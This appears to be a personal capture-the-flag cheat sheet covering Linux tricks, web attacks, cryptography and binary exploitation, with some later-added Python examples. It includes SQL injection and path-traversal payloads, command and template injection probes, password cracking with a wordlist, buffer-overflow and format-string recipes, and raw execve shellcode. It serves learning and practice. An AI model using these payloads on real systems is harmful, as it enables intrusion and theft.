· 6 years ago · Mar 12, 2019, 01:28 AM
*NESTED LOOP IN LINUX
for f in ./*; do for i in "$f"/*; do echo "$i"; wc -c < "$i"; done; done

*SIZE OF FILES IN BYTES
wc -c < filename

-----

file : to get the file type

unzip

eog : to view pictures

convert file.png -scale 300% output.png => resize an image

tesseract file.png out : extract text from an image

------------
script to go into zip files recursively:
nano script.sh
-
#!/bin/bash

# Keep renaming every non-zip file (except this script) to .zip and unzipping it,
# so each layer of a nested archive gets unpacked; stop with Ctrl-C when done.
while true; do
    ls | grep -v "zip" | grep -v "script.sh" | while read line; do
        mv "$line" "$line.zip"
        unzip "$line.zip"
    done
done
-
chmod +x script.sh

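A Python version of the same recursive unpacking, added here as an example (not from the original notes): it walks nested archives with a depth limit and refuses member names that would escape the output directory, two checks the shell loop above does not make. It builds its own nested sample archive, so it runs offline.

```python
import io
import os
import tempfile
import zipfile

def is_safe_member(dest, name):
    """False when a member name (e.g. '../evil.txt') would land outside dest (zip-slip)."""
    root = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(root, name))
    return os.path.commonpath([root, target]) == root

def unzip_recursive(path, dest, depth=0):
    """Extract `path` into `dest`, then every zip inside it; return non-zip files written."""
    if depth > 20:  # guard against endlessly nested archives
        raise ValueError("nesting too deep")
    written = []
    with zipfile.ZipFile(path) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            if not is_safe_member(dest, info.filename):
                raise ValueError(f"member escapes destination: {info.filename}")
            target = os.path.join(dest, info.filename)
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            if zipfile.is_zipfile(target):  # nested archive: recurse into its own directory
                written += unzip_recursive(target, target + ".d", depth + 1)
            else:
                written.append(target)
    return written

def build_zip(member, data):
    """Constructed sample archive holding one member, returned as bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(member, data)
    return buf.getvalue()

def demo(levels=3):
    """Wrap flag.txt in `levels` nested zips, extract, return (names, flag bytes)."""
    data, name = b"flag{constructed}", "flag.txt"
    for i in range(levels):
        data, name = build_zip(name, data), f"layer{i}.zip"
    with tempfile.TemporaryDirectory() as tmp:
        outer = os.path.join(tmp, "outer.zip")
        with open(outer, "wb") as f:
            f.write(data)
        files = unzip_recursive(outer, os.path.join(tmp, "out"))
        return [os.path.basename(p) for p in files], open(files[0], "rb").read()
```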
---------
=> if the zip file requires a password, use fcrackzip with a wordlist to recover it:

locate rockyou.txt
cp path .
fcrackzip -D -u -p rockyou.txt file.zip

-----------

If it asks for a file, try moving along the path, for example: ../flag

-----------

binwalk -e file : to extract embedded files from a file

----
SQL injection:
test' UNION SELECT 1,2 --
test' UNION SELECT (SELECT secret FROM table),2 --

-------
strings file | less : to get the strings from a file

=====
WEB
=====

LDAP injection: if we see OU, CN, ... use the PayloadsAllTheThings repo on GitHub
-------
ROBOTS.TXT
website-url/robots.txt from the root of the webserver

----
CSS
Check the CSS file in sources

OR the JAVASCRIPT file

check the paths /Flag.txt and /Flag.php
---
Scan web site security
nikto -h "website"

----

EDIT COOKIE
use a cookie editor to add a new cookie name + value, ex: admin
----

***python script example for looping over url links

#!/usr/bin/env python3

import requests
import re

url = "http://..."
firstPage = '/fp/'

s = requests.Session()

r = s.get(url + firstPage)  # r = response

counter = 1
while True:
    # pull the next page path out of the body, right after "matchedword"
    nextPage = re.findall(r'matchedword"(.*?)"', r.text)[0]
    r = s.get(url + nextPage)
    print(counter, r.text)
    counter += 1

------------------------

Inspect element + check cookie

---------------------------
Curl website

curl -X OPTIONS "https://../" : to get the allowed methods

if username and pwd required:
1) curl -X POST "https://../" --data username=admin\&password=admin -u admin:admin
2) curl -X PUT "https://../" --data username=admin\&password=admin -u admin:admin
3) curl -X DELETE "https://../" --data username=admin\&password=admin -u admin:admin

-----------------------------
***pyScript for SQL injection by sending a POST to the website

#!/usr/bin/env python3

import requests

url = "http://..."
firstPage = '/fp/'

s = requests.Session()

data = {
    "email": "test",
    "secret_table OR 1=1 --": ""   # then replace by ... OR username='admin' --
}

r = s.post(url, data=data)  # r = response
print(r.text)
s.close()

----------------------------

***network query to scroll down an html page

in the network tab enter the following query:
window.setInterval(function(){window.scrollByLines(1000)},1)

inspect the size of the responses to find the flag; sort by size

------------------------------

***check the web root of the website (APACHE) if we have a .php file // local file inclusion in the website

modify the URL param => /?lang=../../../../../var/www/html/flag.txt

-----------------------

****decode base64

echo "ahgajdehGHAJGH" | base64 -d

--------------------

***Command injection

use => ; to mark the end of the command and add a new cmd such as ls / ls .. to navigate and find the flag
ex: ; ls ../Flag.txt

-----------------

***User Agent to get the web browser version

strings data.pcap | grep -i "user-agent"

google : user agent lookup -> to decode the version

------------------

***modify request header to login

go into the network tab, right click -> copy as curl -> then modify in the CLI

------------

***SQL INJECTION login page
put payloads in both fields, user and pwd
google to find some payloads; try:
' OR 1=1 --
' OR 1=1 #
' OR 1=1 /*
...
sometimes it logs you in as admin because admin is the first element of the table

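To see why the first row wins, here is an added example (not from the original notes): the vulnerable string-built login query next to its parameterised fix, run against a constructed in-memory SQLite table where admin is the first row; the payload is the `' OR 1=1 --` line above.

```python
import sqlite3

PAYLOAD = "' OR 1=1 --"

def make_db():
    """Constructed sample login table; admin is inserted first, as in the note."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "hunter2")])
    return conn

def login_vulnerable(conn, user, pwd):
    """String-built query: whatever the user types becomes part of the SQL text,
    so ' OR 1=1 -- makes the WHERE clause true for every row and comments out the rest."""
    sql = (f"SELECT username FROM users WHERE username = '{user}' "
           f"AND password = '{pwd}'")
    row = conn.execute(sql).fetchone()   # first matching row: admin
    return row[0] if row else None

def login_safe(conn, user, pwd):
    """Parameterised query: the input is bound as data and never parsed as SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (user, pwd),
    ).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, PAYLOAD, PAYLOAD))  # admin
    print(login_safe(db, PAYLOAD, PAYLOAD))        # None
```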
----------

****download as much as possible from a .git repository found on a webserver

use the gitdumper repo
gitdumper.sh "url/.git/" source

cd source
git log
git show <commit sha> and we get the source code of the page
+ use grep "flag"

----------------

****Regex in an input box

try * . ^ to see if it uses regex; to get the flag, try .* which matches everything

--------------
****header exploit

check the network tab
look for suspicious elements
look at the content-type, ex: a jpeg image with content-type: text/css is strange => copy as curl

supposed to get a jpg image but get css, then replace with text/plain to get txt

---------------

***Manual HTTP Request

GET / HTTP/1.1
Host: host

-
GET /login HTTP/1.1
Host: host
-
POST /login HTTP/1.1
Host: host
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

user=admin&pass=admin
-
use the cookie to log in from the root /

GET / HTTP/1.1
Host: host
Cookie: cookiename=value
Content-Length: 21

user=admin&pass=admin

---------

*** FLASK SERVER SIDE TEMPLATE INJECTION (SSTI)
{{7*7}} in an input box to see if it computes the result
then {{config}} to get the SECRET_KEY

-----

****httpS:
check the certificate !!!
add an exception

==============
CRYPTO
==============

*** XOR CRYPTO
python script:

import base64
import pwn

with open('filename.txt', 'r') as fd:
    cipher = fd.read()

cipher = base64.b64decode(cipher)  # to decode base64
for i in range(256):
    # try every single-byte key and print the candidate plaintext
    print(i, pwn.xor(cipher, i))

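The same single-byte brute force without pwntools, added here as an example (not from the original notes) and extended to rank the 256 candidates by how printable and English-looking they are instead of reading 256 lines by eye; the base64 input is constructed inline rather than read from a file.

```python
import base64
import string

PRINTABLE = set(string.printable.encode())
COMMON = set(b"etaoin shrdlu")   # most frequent English letters plus space

def xor_single(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte (what pwn.xor(cipher, i) does above)."""
    return bytes(b ^ key for b in data)

def score(candidate: bytes) -> float:
    """Higher is more English-like: printable fraction plus common-letter fraction."""
    if not candidate:
        return 0.0
    printable = sum(b in PRINTABLE for b in candidate) / len(candidate)
    common = sum((b | 0x20) in COMMON for b in candidate) / len(candidate)
    return printable + common

def crack_single_xor(cipher: bytes):
    """Try all 256 keys; return (best_key, plaintext, candidates ranked best first)."""
    ranked = sorted(((score(xor_single(cipher, k)), k) for k in range(256)), reverse=True)
    best_key = ranked[0][1]
    return best_key, xor_single(cipher, best_key), ranked

def crack_base64(b64_text: str):
    """Same starting point as the note: the file holds base64, so decode it first."""
    best_key, plaintext, _ = crack_single_xor(base64.b64decode(b64_text))
    return best_key, plaintext

# Constructed sample: a known sentence XORed with 0x5a and base64-encoded.
SAMPLE_KEY = 0x5a
SAMPLE_PLAINTEXT = b"the flag is hidden in this sentence"
SAMPLE_B64 = base64.b64encode(xor_single(SAMPLE_PLAINTEXT, SAMPLE_KEY)).decode()

if __name__ == "__main__":
    key, plain = crack_base64(SAMPLE_B64)
    print(hex(key), plain)
```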
-----------------------------------

***VIGENERE CIPHER

from string import ascii_uppercase as uppercase

key = '072...3'   # numeric key: each digit is the shift applied to one letter

flag = ""

with open("cipher.txt", "r") as fd:
    msg = fd.read()
    counter = 0
    for char in msg:
        char = char.upper()  # convert to uppercase

        if char in uppercase:
            index = uppercase.index(char)
            offset = int(key[counter % len(key)])
            new_char = uppercase[index - offset]   # a negative index wraps around the alphabet
            flag += new_char
            counter += 1
        else:
            flag += char

print(flag)

WITHOUT KEY try:
or use https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx to decrypt online

-------------------------

***connect to ip host and port with netcat
nc ip port

connect.sh

#!/bin/bash

nc ip port

chmod +x connect.sh
./connect.sh

--------------------

***python script to send data to input (user & code) // incorrect pwd => it asks again for the pwd
from pwn import *

host = 'ip..'
port = 8080

user = 'admin'

s = remote(host, port)
s.recv()
s.sendline(user)
s.recv()
s.sendline("testcode")

for i in range(1000):
    s.recv()
    # ...
    # compute code...
    # ...
    print(i, code)
    s.sendline(code)

------------

*** CRACK MD5 HASH
google hash cracker -> crackstation.net

-------------

****CLASSIC RSA !!!
google : factordb.com to find p and q from n ! or also alpertron.com

then use ./tools/rsa.py

-------------
***CAESAR CIPHER shift
caesar, rot13 to decrypt a caesar cipher => rot13.com

for i in {0..26}; do echo $i; ....$i; done | less

------------------

*** SUBSTITUTION cipher

use quipqiup.com to crack a substitution cipher
cipherToolDecrypt.py

----------------

***BINARY TO ASCII TEXT

bits = '0100101...'
int(bits, 2).to_bytes((len(bits) + 7) // 8, 'big').decode()

--------------

*** AES: decrypt an AES cipher (mode ECB) from the cipher and key

use decryptAES.py

---------------

*** CRACK HASH PASSWORD:

google hashkiller.com

======================
BINARY EXPLOIT
======================

*** use the app Hopper Disassembler

------------

*** HEXADECIMAL VALUE TO LITTLE ENDIAN
import pwn

pwn.p32(0x08050403)   # packs the 32-bit value as 4 little-endian bytes

-------------

***BUFFER OVERFLOW

script

from pwn import *

s = remote('.. .com', portnbr)

print(s.recv())
while True:
    print(s.recv())
    s.sendline(b'1' * 100)  # in order to overwrite admin=0 with 1

s.close()

------------

*** strings on the program

--------------

*** BASIC BUFFER OVERFLOW

./program
try strings on it

readelf -s program  # to look at the symbols of the binary
we can look for only FUNC symbols:
readelf -s program | grep -i "FUNC"

we can get the address of the secret function in hex

To see if there is a buffer overflow:
send a lot of data

dmesg | tail  # to get only the end

try to send multiple A's until finding where we don't have a segmentation fault !
python -c "print 'A'*50 " | ./program
python -c "print 'A'*30 " | ./program
dmesg | tail
python -c "print 'A'*32 " | ./program  # should see 41414141
python -c "print 'A'*32+'BBBB' " | ./program  # should see 42424242

just replace with the address, in little endian, of where we want to jump
python -c "print 'A'*32+ littleEndianAddress " | ./program

------

***BUFFER OVERFLOW with call to FUNCTION => SHELLCODE
we can use pwntools to develop our own shellcode

use file to check the binary architecture => Intel 80386

use asm to get the assembly code of the shellcode, can be used to call a fct

import pwn

fctAddress = 0x08050403

shellcode = pwn.asm('push 0x08050403; ret')  # assemble: push the memory address on the stack and return to it

python -c "print shellcode " | ./program

*or we can try to craft our shellcode with pwn

import pwn

shellcode = pwn.asm(pwn.shellcraft.i386.linux.cat('flag'))

python -c "print shellcode " | ./program

****** or google shellcode shell-storm to find a lot of shellcode *****
Linux x86 - execve("/bin/bash", ["/bin/bash", "-p"], NULL) - 33 bytes

shellcode = "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"

python -c "print shellcode " | ./program

the shell will work but we die after it; to keep it use:

(python -c "print '..shellcode..' "; cat) | ./program
then use cmds such as:
ls
cat flag.txt

----------------------------------

***TWO'S COMPLEMENT

if unsigned variable
if strtol
we can use the negative value

bin(hex) = 10 == 2 in decimal
then the two's complement is the negative value
to get it, flip the bits and add 1
ex: 010 becomes 101 + 1 = 110 = -2 in decimal

should be represented in 32 bit or 64
code:

binary = bin(intValue)[2:].replace('1', 'x').replace('0', '1').replace('x', '0')  # flip every bit

newInt = int(binary, 2) + 1  # add 1 to the flipped bits

put a negative (-) in front of the newInt value

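A fixed-width version of the recipe above, added here as an example (not from the original notes): it converts both ways at 3, 32 or 64 bits, shows what an unsigned variable sees when a negative strtol() value is stored in it, and ends with a constructed toy balance check that illustrates why a negative amount is dangerous when the lower bound is never tested.

```python
def to_twos_complement(value: int, bits: int) -> str:
    """Binary string of `value` in `bits`-bit two's complement."""
    if not -(1 << (bits - 1)) <= value < (1 << (bits - 1)):
        raise OverflowError(f"{value} does not fit in {bits} signed bits")
    return format(value & ((1 << bits) - 1), f"0{bits}b")

def negate_by_hand(binary: str) -> str:
    """The note's recipe: flip every bit, add 1, keep the same width."""
    flipped = "".join("1" if b == "0" else "0" for b in binary)
    width = len(binary)
    return format((int(flipped, 2) + 1) & ((1 << width) - 1), f"0{width}b")

def from_twos_complement(binary: str) -> int:
    """Read a fixed-width binary string back as a signed integer."""
    value = int(binary, 2)
    return value - (1 << len(binary)) if binary[0] == "1" else value

def as_unsigned(value: int, bits: int) -> int:
    """What a C program sees when a negative strtol() result lands in an unsigned variable."""
    return value & ((1 << bits) - 1)

def purchase_check(balance: int, amount_text: str) -> int:
    """Constructed toy: parse the amount like strtol, refuse only when it is too expensive."""
    amount = int(amount_text)
    if amount > balance:
        raise ValueError("insufficient funds")
    return balance - amount          # a negative amount *adds* money

def purchase_check_fixed(balance: int, amount_text: str) -> int:
    """Same check with the missing lower bound: the amount must be positive."""
    amount = int(amount_text)
    if amount <= 0 or amount > balance:
        raise ValueError("invalid amount")
    return balance - amount
```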
551
552----------------------------
553
554*** in MAN pages you can use ! to get access to the shell
555after that: whoami , ls ...
556
557--------------
558
559*** TRY SPENDING A NEGATIVE AMOOUNT OF MONEY !
560
561---------------
562
563
564*** FORMAT STRING ATTACK : printf in C EXPLOIT!
565google format string attack -> owasp
566program asks input and print it
567can exploit it, if printf has no second argument, -> printf(myInput)
568payload :
569send :
570%x for to read data from stack
571%p to read pointer from stack
572..
573
574
575we can use this for example to read secret from stack !!
576send a lot of %p %p %p into input
577
578
579
580can use gcc to compile the original source code:
581gcc -g -m32 code.c -o newbin //use -g for debug and -m32 to get in 32bits binary, -o for output file name
582//compile to detect if source code correct, can get some warnings for example !!
583
584then use:
585 gdb ./newbin
586
587disas main //give the name of fct
588b *0x98...hex //use to break att hex adress
589r //to run
590p secret //use p to print value of secret !!!
591
592c //to continu program
593
594
595so we know secret on the stacl
596
597with printf we can specify which offset of the stack we want,
598ex: 8 value on the stack=position => %8$p =>get secret
599
600
601--------------------------
602
*** BASH COMMAND INJECTION

close the command with "; or just ; and after that use ls, cat flag.txt

------------

***STRINGS ON BINARY!

-------------

*** GETS!!!!!!!!!!!!! BUFFER OVERFLOW

IF we have something like
int admin = 0
char username[16]
+
gets(username)

-> then overflow with 'A' * 16 ! we can replace A with \x01 to overflow admin with 1 => admin=1 !

(python -c "print '\x01' * 17 "; cat) | ./program
ls
cat flag.txt

----------------

****MODIFY BINARY WITH PWNTOOLS!!!!!!!!!!!!!

first inspect with Hopper
then readelf -s program  # to get function names and addresses

if we have the bin we can try to modify some function by using
modifyBin.py and pwntools ELF !

----------------

*****PRINTF BUFFER OVERFLOW if no second parameter